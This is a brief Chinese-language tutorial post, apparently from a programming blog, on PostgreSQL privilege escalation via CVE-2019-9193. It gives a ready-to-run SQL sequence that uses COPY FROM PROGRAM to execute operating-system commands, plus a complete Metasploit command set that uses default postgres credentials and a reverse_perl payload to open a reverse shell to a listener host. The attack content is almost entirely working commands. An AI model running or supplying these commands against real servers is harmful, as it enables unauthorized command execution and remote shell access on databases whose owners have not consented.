postgresql提权
2022/1/29 2:04:31
本文主要是介绍postgresql提权,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
(CVE-2019-9193)
CVE-2019-9193:PostpreSQL 9.3-11.2 允许经过身份验证的superuser或者拥有pg_read_server_files权限的用户执行任意命令:
drop table if exists cmd_exec; create table cmd_exec(cmd_output text); copy cmd_exec from program 'id'; select * from cmd_exec; drop table if exists cmd_exec;
需要注意的是:命令中的单引号需要用双引号进行转义,如:echo 'test' >> 'echo "test";'
MSF中也有对应的利用模块:
use exploit/multi/postgres/postgres_cmd_execution_nine_three set RHOST 192.168.1.5 set payload cmd/unix.reverse_perl set database postgres set username postgres set password postgres set LHOST 192.168.1.6 set LPORT 53 exploit
参考链接:http://t3ngyu.leanote.com/post/Postgresql
这篇关于postgresql提权的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-01-05快速清空 PostgreSQL 数据库中的所有表格,让你的数据库重新焕然一新!
- 2024-01-04在PostgreSQL中创建角色:判断角色是否存在并创建
- 2023-05-16PostgreSQL一站式插件推荐 -- pg_enterprise_views
- 2022-11-22PostgreSQL 实时位置跟踪
- 2022-11-22如何将PostgreSQL插件移植到openGauss
- 2022-11-11PostgreSQL:修改数据库用户的密码
- 2022-11-06Windows 环境搭建 PostgreSQL 物理复制高可用架构数据库服务
- 2022-10-27Windows 环境搭建 PostgreSQL 逻辑复制高可用架构数据库服务
- 2022-10-11PostgreSql安装(Windows10版本)
- 2022-09-13PostgreSQL-Network Address类型操作和函数